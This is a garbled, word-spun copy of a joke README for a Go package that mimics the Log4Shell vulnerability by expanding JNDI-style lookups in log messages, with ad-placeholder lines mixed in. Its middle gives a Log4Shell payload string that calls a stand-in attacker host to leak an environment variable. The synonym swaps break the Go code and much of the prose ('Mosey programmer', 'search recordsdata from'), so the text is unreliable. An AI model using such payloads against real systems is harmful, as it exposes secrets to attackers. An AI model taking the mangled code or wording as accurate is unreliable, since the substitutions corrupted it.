Is CVE-2021-44228 making you in actuality feel overlooked as a Mosey programmer?
Effort no longer. We can fix that.
Featured Content Ads
add advertising hereI wouldn’t consume this kit, however when it’s good to to…
kit main import "github.com/bradfitz/jndi" var logger = jndi.NewLogger() func main() { //... } func handleSomeTraffic(r *search recordsdata from) { logger.Printf("bought search recordsdata from from %s", r.URL.Course) }
Congrats, the user in actuality wrote ${jndi:ldap://attacker.instance/${env:${decrease:u}ser}} and
the logger expanded your ambiance variable and sent it over the community
as a aspect-attain of logging.
Inspiration
I observed https://twitter.com/_StaticFlow_/station/1469358229767475205 and thought it would possibly perchance perchance in point of fact perchance perchance
be relaxing to write an expander whereas I was once bored, stuck in transit.
Featured Content Ads
add advertising hereBugs
This kit is incomplete. log4j in actuality does a bunch extra:
- https://logging.apache.org/log4j/2.x/handbook/configuration.html#PropertySubstitution
- https://logging.apache.org/log4j/2.x/handbook/lookups.html
Patches welcome to abet flesh this kit out. We now bring together bought some
catching as much as attain.
Apologies
If you’re seeing this on GitHub and no longer by means of Twitter, I acknowledged
that here’s questionable taste: https://twitter.com/bradfitz/station/1469523985998118925
In novel I judge in the total #hugops thing. I had a CVE filed against
my gain code correct the day sooner than: https://twitter.com/bradfitz/station/1469015417679081472
Featured Content Ads
add advertising hereIt occurs. I joke to manage.